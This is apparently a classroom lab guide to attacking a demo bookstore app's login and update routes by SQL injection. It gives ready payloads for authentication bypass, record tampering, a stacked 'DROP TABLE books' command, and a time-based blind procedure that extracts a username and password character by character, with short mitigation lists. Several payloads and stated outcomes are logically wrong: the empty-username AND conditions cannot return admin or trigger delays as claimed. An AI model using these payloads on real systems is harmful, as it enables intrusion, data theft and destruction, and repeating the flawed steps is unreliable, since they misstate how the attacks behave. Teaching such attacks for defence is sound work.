CREATE TABLE books (

id INT PRIMARY KEY,

title VARCHAR(50),
author VARCHAR(50),
price DECIMAL(10,2)
);

INSERT INTO books (id, title, author, price) VALUES

(1, 'Book 1', 'Author A', 43.00),
(2, 'Book 2', 'Author B', 34.00),
(3, 'Book 3', 'Author C', 65.00),
(4, 'Book 4', 'Author D', 54.00),
(5, 'Book 5', 'Author E', 15.49);

1. Basic SQL Injection

Purpose: Bypass authentication or extract data by injecting logical conditions.

Attack Steps:
Login Route SQL Query:

const sql = `SELECT * FROM users WHERE username = '${username}' AND password =
'${password}'`;

1.
2. Input Example:

○ Username: ' OR 1=1 --

○ Password: anything

Resulting Query:

SELECT * FROM users WHERE username = '' OR 1=1 -- AND password = 'anything';

3.
4. Outcome:

○ The condition OR 1=1 always evaluates as true.

○ Logs in as the first user in the database (e.g., admin).
2. Modify Database

Purpose: Alter database records or inject new commands into the query.

Attack Steps:
Update Route SQL Query:

const sql = `UPDATE books SET price = '${newPrice}' WHERE id = '${bookId}'`;

1.
2. Input Example:

○ Book ID: 1
○ New Price: 0, title = 'Hacked!'

Resulting Query:

UPDATE books SET price = 0, title = 'Hacked!' WHERE id = '1';

3.
4. Outcome:

○ Updates the book's price to 0 and its title to Hacked!.

3. Content-Based Blind SQL Injection

Purpose: Extract data by observing the application's behavior (e.g., error messages, response
content).

Attack Steps:
Login Route SQL Query:

const sql = `SELECT * FROM users WHERE username = '${username}' AND password =
'${password}'`;

1.
2. Input Example:

○ Username: ' AND 1=1 --

○ Password: anything
Resulting Query:

SELECT * FROM users WHERE username = '' AND 1=1 -- AND password = 'anything';

3.
4. Outcome:

○ If true, returns the first user (e.g., admin).

○ For testing incorrect conditions:
■ Username: ' AND 1=2 --
■ Observe changes in the response to infer data.

4. Time-Based Blind SQL Injection

Purpose: Extract data by causing delays to infer conditions without visible responses.

Attack Steps:
Login Route SQL Query:

const sql = `SELECT * FROM users WHERE username = '${username}' AND password =
'${password}'`;

1.
2. Input Example:

○ Username: ' AND IF(1=1, SLEEP(5), 0) --

○ Password: anything

Resulting Query:

SELECT * FROM users WHERE username = '' AND IF(1=1, SLEEP(5), 0) -- AND password =
'anything';

3.
4. Outcome:

○ If condition is true, the server delays for 5 seconds.

○ Refine queries to extract data character by character (e.g., check specific
usernames).
5. Multiple SQL Statements

Purpose: Inject multiple commands to execute unintended operations.

Attack Steps:
Update Route SQL Query:

const sql = `UPDATE books SET price = '${newPrice}' WHERE id = '${bookId}'`;

1.
2. Input Example:

○ Book ID: 1
○ New Price: 0; DROP TABLE books; --

Resulting Query:

UPDATE books SET price = 0; DROP TABLE books; -- WHERE id = '1';

3.
4. Outcome:

○ Drops the books table, deleting all its data.

○ Only works if multipleStatements: true is enabled in your db
configuration.

Testing the Attacks:

1. Use tools like Postman, cURL, or a web browser to send requests.

2. Adjust input fields in the login and update forms to inject the payloads.
3. Observe the results in the database or responses for confirmation.

Prevention:

● Parameterized Queries: Use ? placeholders and pass inputs securely.

● Sanitize Inputs: Strip out dangerous characters like ;, ', and --.
● Limit Permissions: Avoid granting unnecessary permissions (e.g., DROP or DELETE).
● Enable Logging: Monitor suspicious activities and respond quickly.
By testing and understanding these attacks, you can better secure your bookstore application
against vulnerabilities.

Time-Based Blind SQL Injection - Detailed Documentation

This attack determines data such as username and password by observing the time it takes for
the database to respond. The attacker leverages conditional statements (e.g., IF) to cause
deliberate delays.

Steps to Extract Data Using Time-Based Blind SQL Injection

Step 1: Test for Vulnerability

1. Target Endpoint: /login (POST method).

2. Initial Query:

○ Username: ' OR IF(1=1, SLEEP(5), 0) --

○ Password: anything

Resulting SQL:
 SELECT * FROM users WHERE username = '' OR IF(1=1, SLEEP(5), 0) -- AND password =
'anything';

3.
4. Outcome:

○ If the query delays for 5 seconds, the endpoint is vulnerable to time-based SQL
injection.

Step 2: Determine Username Length

1. Query Format:

○ Username: ' OR IF(LENGTH(username)=X, SLEEP(5), 0) --

○ Password: anything
2. Example with admin:

○ Username: ' OR IF(LENGTH(username)=5, SLEEP(5), 0) --

○ Password: anything

Resulting SQL:

SELECT * FROM users WHERE username = '' OR IF(LENGTH(username)=5, SLEEP(5), 0) --

AND password = 'anything';

3.
4. Outcome:

○ Delays confirm the username length (e.g., 5 for admin).

Step 3: Determine Username Character by Character

1. Query Format:

○ Username: ' OR IF(SUBSTRING(username, N, 1)='C', SLEEP(5), 0)

--
○ Password: anything
2. Example for First Character:
 ○ Username: ' OR IF(SUBSTRING(username, 1, 1)='a', SLEEP(5), 0)
--
○ Password: anything

Resulting SQL:

SELECT * FROM users WHERE username = '' OR IF(SUBSTRING(username, 1, 1)='a',

SLEEP(5), 0) -- AND password = 'anything';

3.
4. Outcome:

○ Delays confirm if the first character is a.

○ Repeat for subsequent characters (e.g., 2, 3, ...) to extract the full username
(admin).

Step 4: Determine Password Length

1. Query Format:

○ Username: ' AND IF(LENGTH(password)=X, SLEEP(5), 0) --

○ Password: anything
2. Example with adminpass:

○ Username: ' AND IF(LENGTH(password)=9, SLEEP(5), 0) --

○ Password: anything

Resulting SQL:

SELECT * FROM users WHERE username = '' AND IF(LENGTH(password)=9, SLEEP(5), 0) --

AND password = 'anything';

3.
4. Outcome:

○ Delays confirm the password length.

Step 5: Determine Password Character by Character

 1. Query Format:

○ Username: ' AND IF(SUBSTRING(password, N, 1)='C', SLEEP(5),

0) --
○ Password: anything
2. Example for First Character:

○ Username: ' AND IF(SUBSTRING(password, 1, 1)='a', SLEEP(5),

0) --
○ Password: anything

Resulting SQL:

SELECT * FROM users WHERE username = '' AND IF(SUBSTRING(password, 1, 1)='a',

SLEEP(5), 0) -- AND password = 'anything';

3.
4. Outcome:

○ Delays confirm if the first character is a.

○ Repeat for subsequent characters to extract the full password.

Example Workflow for Extracting admin and adminpass

1. Determine username length:

○ ' OR IF(LENGTH(username)=5, SLEEP(5), 0) --

○ Response delay confirms username length is 5.
2. Determine username (admin):

○ ' OR IF(SUBSTRING(username, 1, 1)='a', SLEEP(5), 0) -- →

Delays.
○ Repeat for all characters.
3. Determine password length:

○ ' AND IF(LENGTH(password)=9, SLEEP(5), 0) --

○ Response delay confirms password length is 9.
4. Determine password (adminpass):
 ○ ' AND IF(SUBSTRING(password, 1, 1)='a', SLEEP(5), 0) -- →
Delays.
○ Repeat for all characters.

Outcome of the Attack

● Extracted Username: admin

● Extracted Password: adminpass

Mitigation Strategies

● Use Parameterized Queries: Avoid concatenating input into SQL queries.

● Limit Query Execution Time: Prevent excessive delays from SLEEP() injections.
● Implement Captchas: Thwart automated brute-force attempts.